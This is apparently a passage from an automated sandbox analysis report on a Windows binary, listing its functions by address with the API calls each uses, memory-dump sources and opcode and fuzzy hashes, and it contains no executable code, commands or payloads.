                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                • Instruction ID: 48bddcbc35eaa0730f37c22b74fdef8f47fdd9a622929716748fc143609d3f4a
                                                                                • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                • Instruction Fuzzy Hash: 9341D721B1BA8282FE71AF359800AF5E395FF447A0F894535DD1D8B398EE3CE4159310
                                                                                Function 00007FF79F91FF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable
                                                                                • String ID:
                                                                                • API String ID: 2939132127-0
                                                                                • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                • Instruction ID: 584912e9040c36ec528572c6f5dd3a8158b9e55b87f90baa94627ec6857b46d0
                                                                                • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                • Instruction Fuzzy Hash: A9517032949BC681FB719B25D8942F8B760EB85B64FA94131CA0D877BCCE3DE445CB20
                                                                                Function 00007FF79F8DD924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                • Instruction ID: ff9a6f8554afe97531df841622e977a1a5d8d437d9ab55b1b9a410e4dfc99a6c
                                                                                • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                • Instruction Fuzzy Hash: 8531093660868557E760DF39E8486A9B391FB88BA8F814132EE5D87798CE3DE845C710
                                                                                Function 00007FF79F8F3824 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                • Instruction ID: ee284cf9a1958584fa13eb98ce05514cc5cf7a89b672ca4346291b2d6b05fe55
                                                                                • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                • Instruction Fuzzy Hash: 7241E321E2D6C28AFBF0AB34E489BF9A790AF61B54F940035D44D861E8CF2DE454D3B0
                                                                                Function 00007FF79F8E1B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                • String ID:
                                                                                • API String ID: 2655805287-0
                                                                                • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                • Instruction ID: 37789d5e3db374fc2b56527a9c50ae49bb6a8f3445ca0f4a35764805cdc7d8cf
                                                                                • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                • Instruction Fuzzy Hash: E521E722B096C245EB64EB32A9046F5A790BF89FE4F944530EE5D87795EE3CE450C310
                                                                                Function 00007FF79F902E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                • Instruction ID: 2549dbb8da0ef672f726b06b6cc4e1d02a03ccfd07b57b29f8b0bee966e34170
                                                                                • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                • Instruction Fuzzy Hash: E0218622B18A8186E714EF36D8441FDE3A1FB88FA0B894035DE1D87B59DF3CD4418750
                                                                                Function 00007FF79F8A1F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2067211477-0
                                                                                • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                • Instruction ID: cbc968c8675603b6a3bf0bec4d9dd2c1feacb5ad6b99757241acccb1684f298f
                                                                                • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                • Instruction Fuzzy Hash: BD215025A0EBC285EEA5EB7594509F9E390EF84B90F884431DE4D47799DF3CE424DA20
                                                                                Function 00007FF79F8AF9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                • Instruction ID: d6c95bf55860f0bc6330536523913e1671febe8cbdd6f75b1ba00983a80feb93
                                                                                • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                • Instruction Fuzzy Hash: 89118626E3A68305F7F43135E443BF59142EF54364F855234EAAE46EDAAE1CF4606120
                                                                                Function 00007FF79F8DCB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                • Instruction ID: 1f318e185808d14047443c62714f2206cfa9ce7463a27fb8e3ac689f5059b4ba
                                                                                • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                • Instruction Fuzzy Hash: 2B118C36A04B81C6E760EF22EC445A9B7A4FB89F90F954436CF8947B58DF38E815C740
                                                                                Function 00007FF79F8DCAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                • Instruction ID: 76d4e306543c4b70e0c309c1471d0467087c9b6ac8492ba2da6af831d5ac6e38
                                                                                • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                • Instruction Fuzzy Hash: 73118836604B8186E720EF22E8445ADB7B4FB89FA0B964436CF8847B58DF38E425C740
                                                                                Function 00007FF79F8DB748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                • Instruction ID: 3ba7d7943c5e37ae42ff7f49f439331ba4e3404ab8a30895dbe24dc3866d8c0e
                                                                                • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                • Instruction Fuzzy Hash: F8115225A08AC187E760AB36E8007A9A3A4FF85FD4F984035DF4D8BB58CF3DD8559B10
                                                                                Function 00007FF79F8E2ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                • Instruction ID: cdda5813b0ffae956a1fda8b36b766e31f6042d674e25b5e5624d0b1806b0b17
                                                                                • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                • Instruction Fuzzy Hash: F311A523A089C281EB75BF34E4447F9A360FF88B54F844031D95D4A298DF7CD999C320
                                                                                Function 00007FF79F8ED7F8 Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                • Instruction ID: 451f63116c1c6b0743951e10c5b0e08de912dae3dee888cfc59e0d80907333b6
                                                                                • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                • Instruction Fuzzy Hash: 0A014C22B1CA8282EB75B730E8906BDD320AF957A0BD44235E11FD56A4DF2CF4D8C620
                                                                                Function 00007FF79F8F0008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F003C
                                                                                • TerminateThread.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F0047
                                                                                • WaitForSingleObject.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F0055
                                                                                • ~SyncLockT.VCCORLIB ref: 00007FF79F8F005E
                                                                                  • Part of subcall function 00007FF79F8EF7B8: CloseHandle.KERNEL32(?,?,?,00007FF79F8F0063,?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8EF7C9
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F006A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3142591903-0
                                                                                • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                • Instruction ID: de949e1aa3e81470e10ffb63770d5b4043c54c3a83bc43d8e945839e0c3267c6
                                                                                • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                • Instruction Fuzzy Hash: 1B010C3AA18B8186E760AF25E8442A9B360FB98B61F544035DB8D87B59CF3CD496C790
                                                                                Function 00007FF79F8A1DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorExitLastThread
                                                                                • String ID:
                                                                                • API String ID: 1611280651-0
                                                                                • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                • Instruction ID: fcf92c1d5ac6e2dfc9a66b17af1ff59db5abfaf6771de769b77fbfe72c064977
                                                                                • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                • Instruction Fuzzy Hash: 8F012C21B0AAC292EA647B3098446FCA365EF40B75F945734C63E466D9DF2CE868C310
                                                                                Function 00007FF79F8EB5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                • String ID:
                                                                                • API String ID: 179993514-0
                                                                                • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                • Instruction ID: c7053aecc035eddfbdf0251393c63eb35b9fda02671ed54074dc00a9adc19dd6
                                                                                • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                • Instruction Fuzzy Hash: 59F0E510F1828242FBB477B67C487F483416F48760FC14030C80A862A5EE7C94A59220
                                                                                Function 00007FF79F8F6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 948891078-24824748
                                                                                • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                • Instruction ID: c4ddc1949527d20576f0c1a7ccdf94690bdedb1c1281836a81c8689aeb593e5b
                                                                                • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                • Instruction Fuzzy Hash: 8BD1C462B18A8685EBA0FB35D481AEDA760FB90B88F805031EE4E47B65DF3CD154D750
                                                                                Function 00007FF79F8B0040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
